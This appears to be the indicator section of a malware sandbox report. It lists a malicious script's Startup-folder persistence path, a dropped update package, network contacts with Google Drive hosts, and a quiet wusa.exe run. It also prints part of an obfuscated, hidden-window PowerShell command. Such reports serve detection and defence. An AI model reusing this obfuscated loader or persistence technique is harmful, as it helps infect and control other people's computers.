Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.js
- %TEMP%\upwin.msu
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wusa.exe qROlk /quiet /norestart
- '<SYSTEM32>\wusa.exe' qROlk /quiet /norestart
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "sleep 180"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $jPhaA = 'JA' + [char]66 + 'LAEEAVA' + [char]66 + 'pAGgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qA...' (with hidden window)